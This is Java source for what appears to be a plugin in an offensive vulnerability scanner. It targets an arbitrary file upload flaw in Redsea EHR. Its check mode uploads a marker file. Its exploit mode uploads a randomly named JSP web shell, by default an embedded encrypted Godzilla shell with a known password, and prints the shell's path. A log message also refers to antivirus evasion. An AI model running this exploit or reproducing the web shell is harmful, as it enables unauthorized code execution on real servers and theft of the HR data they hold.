package com.achuna33.Controllers;

import com.achuna33.SupportType.Poc_Exp;
import com.achuna33.SupportType.SupportVul;
import com.achuna33.Utils.HttpRequest;
import com.achuna33.Utils.Response;
import com.achuna33.Utils.Utils;
@BasicMapping(uri = "红海EHR")
public class ehrController extends Controller implements BasicController{
    @VulnerabilityDescriptionMapping(Description="红海EHR任意文件上传漏洞" ,SupportVulType= SupportVul.UploadFile)
    public void vul_ehr_CVM(Poc_Exp type, String target, Object... args) throws Exception {
        WriteLog("\n[*]开始检测：  红海EHR任意文件上传漏洞");
        String data = "------WebKitFormBoundaryQb1l0Fqa\r\n" +
                "Content-Disposition: form-data; name=\"OPTION\"\r\n" +
                "\r\n" +
                "{\"OPTION\":\"SAVEFILE\"}\r\n" +
                "------WebKitFormBoundaryQb1l0Fqa\r\n" +
                "Content-Disposition: form-data; name=\"FILENAME\"\r\n" +
                "\r\n" +
                "{\"FILENAME\":\"versions.txt\"}\r\n" +
                "------WebKitFormBoundaryQb1l0Fqa\r\n" +
                "Content-Disposition: form-data; name=\"file\";filename=\"versions.txt\"\r\n" +
                "\r\n" +
                "shellcode\r\n" +
                "------WebKitFormBoundaryQb1l0Fqa";
        String url2 = "/cas/js/lib/buttons/iconfig.jsp";
        String url = "/RedseaPlatform/OfficeServer";
        switch (type){
            case EXP:
                String path = null;
                String mypayload = null;
                try {
                    path = (String) args[0];
                    try {
                        byte[] bytes = Utils.readFile(path);
                        mypayload = new String(bytes);
                    }catch (Exception e){
                        WriteExpLog("\n [*] 文件读取失败");
                    }
                }catch (Exception e){

                }
                String payload = "<%! String xc=\"3c6e0b8a9c15224a\"; class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance(\"AES\");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),\"AES\"));return c.doFinal(s); }catch (Exception e){return null; }}\n" +
                        "%><%try{byte[] data=new byte[Integer.parseInt(request.getHeader(\"Content-Length\"))];java.io.InputStream inputStream= request.getInputStream();int _num=0;while ((_num+=inputStream.read(data,_num,data.length))<data.length);data=x(data, false);if (session.getAttribute(\"payload\")==null){session.setAttribute(\"payload\",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute(\"parameters\", data);Object f=((Class)session.getAttribute(\"payload\")).newInstance();java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();f.equals(arrOut);f.equals(pageContext);f.toString();response.getOutputStream().write(x(arrOut.toByteArray(), true));} }catch (Exception e){}\n" +
                        "%>";

                if (mypayload!=null){
                    payload = mypayload;
                }else {
                    WriteExpLog("\n [*] 默认shell 为哥斯拉shell 密码 key");
                }
                String expshellpath = Utils.getRandomString(4)+".jsp";
//                url = url.replace("iconfig.jsp",expshellpath);
                HttpRequest httpRequest3 = new HttpRequest(target+url);
                httpRequest3.addHeaders("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.31");
                httpRequest3.addHeaders("X-Requested-With","XMLHttpRequest");
                httpRequest3.addHeaders("Accept-Encoding"," gzip, deflate");
                httpRequest3.addHeaders("Content-type","multipart/form-data; boundary=----WebKitFormBoundaryQb1l0Fqa");
                httpRequest3.addHeaders("Accept-Language"," zh-CN,zh;q=0.9");
                httpRequest3.addHeaders("Accept"," application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequest");
                data = data.replace("shellcode",payload).replace("versions.txt",expshellpath);

                httpRequest3.Post(data);

                Response result1 = new HttpRequest(target +"/uploadfile/"+expshellpath).Get("");
                if(result1.statusCode==200){
                    WriteExpLog("\n[*] shell path:\n"+target +"/uploadfile/"+expshellpath);
                }else {
                    WriteExpLog("\n 访问失败:\n"+target +"/uploadfile/"+expshellpath);
                    WriteExpLog("\n 请验证POC 可靠性 或 EXP免杀性");

                }
                break;
            case POC:
                String shellpath = Utils.getRandomString(4)+".txt";
                String poc = "103ccba74d78db6awfererterter3c";
                HttpRequest httpRequest2 = new HttpRequest(target+url);
                httpRequest2.addHeaders("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.31");
                httpRequest2.addHeaders("X-Requested-With","XMLHttpRequest");
                httpRequest2.addHeaders("Accept-Encoding"," gzip, deflate");
                httpRequest2.addHeaders("Content-type","multipart/form-data; boundary=----WebKitFormBoundaryQb1l0Fqa");
                httpRequest2.addHeaders("Accept-Language"," zh-CN,zh;q=0.9");
                httpRequest2.addHeaders("Accept"," application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequest");
                httpRequest2.Post(data.replace("shellcode",poc).replace("versions.txt",shellpath));
                Response result = new HttpRequest(target+"/uploadfile/"+shellpath).Get("");
                if(result.responseBody.contains("103ccba74d78db6awfererterter3c")&&result.statusCode==200){
                    WriteLog("\n[*] 存在漏洞");
//                    WriteLog("访问："+target +url2.replace("iconfig.jsp",shellpath));
                }else {
                    WriteLog("\n[-] 不存在漏洞");
                }
        }
    }
}
